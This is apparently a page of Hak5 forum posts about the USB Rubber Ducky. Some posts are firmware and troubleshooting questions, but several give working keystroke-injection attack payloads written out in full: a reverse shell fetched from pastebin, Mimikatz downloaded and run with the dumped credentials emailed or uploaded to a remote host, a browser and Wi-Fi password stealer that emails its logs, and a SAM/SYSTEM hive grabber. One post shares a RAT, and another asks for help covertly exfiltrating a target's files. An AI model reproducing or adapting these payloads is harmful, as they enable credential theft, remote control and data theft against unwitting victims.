Search the Community

I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?

Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius

I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.

hi guys i've a big proble, in the last weeks i won a usb rubber ducky during an hackathon but the replay buttons seems broken. When i press it the rubber ducky doesn't replay the script, what could be the problem?

Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?

Hi Guys I am trying to get the PHP working on my Apache install that is detailed here: https://www.hak5.org/gear/duck/what-is-the-best-security-awareness-payload-for-the-usb-rubber-ducky I am looking to get IP and browser details as described. My Apache logs are saying the error is: PHP Parse error: Does anyone have a clue where on this line the error is? I am no PHP guy :) Any help is appreciated. Thanks Phil

Hey guys.. Can someone help me out with this cmdlet error ? I've flashed my duck with no probs.. No spelling error from the scripts. When i keyed this manually with win+r key... STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')" It created a folder inside of slurp but with no files exfiltrated.. And whenever i tried to run the inject with twin duck(1).. I got this error popped out instead. Did i missed something here ? Thank you.

I recently ordered a Usb rubber ducky and payed through the DSL Delivery Option I need it for my school project may i know how much does it takes to the ducky to be on ur doorsteps

I know this may be seen as a very pointless and stupid question. Does the Hak5 team provide a set of the icons they use for the various diagrams they publish? E.g https://www.hak5.org/wp-content/uploads/2017/10/openvpn_diagram1.png Although not essential it would be good to be able to produce diagrams while learning, using the same theme as used by Hak5. Must admit I really like the simplistic look of them.

I have created an one second ducky payload its stupid simple use browser auto pwn by meatspolit to get a shell on any box but you can also use a beef hook I cant afford your tools so that is why it theoretical. Some please try it probably wont work but it a good concept. run "your website" enter enter alt f4

Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW

Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤

I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.

This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & ChromePass.exe /stext logs\ChromePass.txt & OperaPassView.exe /stext logs\OperaPassView.txt STRING & PasswordFox.exe /stext logs\PasswordFox.txt & SkypeLogView.exe /stext logs\SkypeLogView.txt & WebBrowserPassView.exe /stext logs\WebBrowserPassView.txt & WirelessKeyView.exe /stext logs\WirelessKeyView.txt & powershell -ExecutionPolicy Bypass %TEMP%\tools\file.ps1 STRING & cd %TEMP% & del tools.zip & exit ENTER STRING Add-Type -AssemblyName System.IO.Compression.FileSystem ENTER STRING function Unzip ENTER STRING { ENTER STRING param([string]$zipfile, [string]$outpath) ENTER STRING [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) ENTER STRING } ENTER STRING wget "http://pathtotools.zip/Tools.zip" -OutFile $ENV:temp\tools.zip ENTER STRING Unzip $ENV:temp\tools.zip $ENV:temp ENTER STRING cd $ENV:temp\tools ENTER STRING mkdir logs ENTER STRING exit ENTER Link to the tools: https://www.mediafire.com/file/ddcur1ebc3fbvb5/Tools.zip HOW TO SET IT UP ------------------------------------------------------- Download the Tools.zip file and extract it. Then, open file.ps1 with notepad or whatever program you like and changer "YourUsername" to you username (i.e bertfast) and "YourPassword" to your password. Then change "receiver" to whoever you want to send the logs to. I MADE IT WORK WITH GMAIL. I don't know if it works with other services. After that, zip the Tools folder (don't zip the files or it won't work). In the code above, change "http://pathtotools.zip/Tools.zip" to the path where you have hosted the zip file. Tested in Windows 10 x64. BIG thanks to MrGray for the original script. Also, big thanks to Nurrl. With Duckuino i converted the code above to make it work with my arduino (I don't own a rubber ducky, sorry ) Please tell me if it worked or not and the OS you are using

I bought the USB Rubber Ducky, and it appears that I cannot get it to go into DFU mode. After taking the Micro SD card out, I hold the black button and stick it into my PC, but all I see is a solid red LED on the Ducky. I'm trying to get it to go into DFU mode so I can get Twin Ducks but the DFU mode isn't working. Any help would be greatly appreciated.

I´m using Windows 10 with Microsoft Visual C++ 2010 Redistributable, Flip (JRE_Flip_Installer_3.4.2.exe) and Atmel Driver (atmel-flip-3.4.2-signed-driver.zip). My "program.bat": @echo off rem setup console title RubberDucky Programming @echo ____________________________________________ @echo [#] RubberDucky Programming Script @echo [-] Programming File: [%1] if "%1"=="" ( goto :bail ) if not exist %1 ( goto :bail ) batchisp -device at32uc3b0256 -hardware usb -operation erase f memory flash blankcheck loadbuffer %1 program verify start reset 0 goto :done :bail @echo [!] Please provide valid input (.hex) file! :done goto :eof When I use "program.bat" with any firmware, I have the following message: Device selection....................... PASS Hardware selection..................... PASS Opening port........................... PASS Reading Bootloader version............. PASS 1.0.2 Erasing................................ PASS Selecting FLASH........................ PASS Blank checking......................... PASS 0x00000 0x3ffff Parsing HEX file....................... PASS ????????.hex WARNING: The user program and the bootloader overlap! Programming memory..................... PASS 0x00000 0x07caf Verifying memory....................... PASS 0x00000 0x07caf Starting Application................... PASS RESET 0 I tried to use with the following firmwares: c_duck_v2.hex c_duck_v2.1.hex c_duck_v2_S001.hex c_duck_v2_S002.hex Composite_Duck_S003.hex duck.hex duck_v2.hex duck_v2.1.hex m_duck.hex m_duck_v2.hex usb.hex USB_v2.hex USB_v2.1.hex Only firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex" the light blink green. With the others firmwares, the light blink red. With "usb???.hex", the light don´t turn on. Even with the firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex", the script does not run on either Windows 7 or Windows 10. My script (inject.bin): REM Prints: Hello World! DELAY 10000 STRING Test DELAY 5000 STRING Hello World I tried with the MicroSD card original (128MB format with FAT and FAT32) and with another MicroSD card (64MB format with FAT). Please, I need some help. Thank you.

This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER

i want to modify the source code of one of the firmware of rubber ducky project, example write in a .text file inside the memory a number each time i plug the memory in a pc ... but a i am a little lost with the code somebody have experience in this, somebody have been working in this issue thanks and sorry my english i am a latinoamerican

I am planning on buying the USB Rubber Ducky and I was wondering if this is possible. I was wondering if I or someone could make a payload or whatever it's called to remotely control a computer outside the network. Perhaps like VNC. Also if you could teach me how to make it WON from a different network. I would really appreciate if someone says its all possible to do with a rubber ducky alone, and also help me. THANKS!

whenever i run a payload that has a string with the '@' symbol, it writes ' " ' instead.... any way around this???

Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.

Hi hak5, I'm new here and I wanted to buy the rubber ducky but the problem is that it's not shipped in my country ( Pakistan ) so how can I get one, please help.

I downloaded files from Github ,and installed "atmel flip ",but I don't know how to use this . i also saw a Video ,this showed me something about flashing on windows,but I can't understand that ,why he used cmd to flash firmare ?if I need not to install any applications,just use cmd ? thank you help me.my English is bed

when i plug my USB rubber ducky into the USB slot and push the black button the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if i don't have any SD card in the slot. i am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard if anyone has the factory hex i would appreciate if you send it to me thanks

Hello, first of all sorry if this is the wrong place to post this... I'm a super newbie but I have an exfiltration attack I need to carry out and was hiping you could help out. I don't particularly feel comfortable in betting on a period of time alone with the target computer so I'd rather socially engineer it. I plan to do this by offering to transfer peace offering files off of my USB (likely to be either a rubber ducky or a bash bunny) whilst the payload does its thing. The main problem I'm having is in the size of the files I plan to exfiltrate they are upwards of 10mb and there may be hundreds. In order to cover the time it would take to exfiltrate these files, my "peace offering" also needs to be sizeable. My question is do you think this is possible and also what tool do you think can best carry out this task? Any help welcome!! P.S. My research has lead me to believe that exfiltration isn't possible through wifi pineapple, if this is incorrect please let me me know :)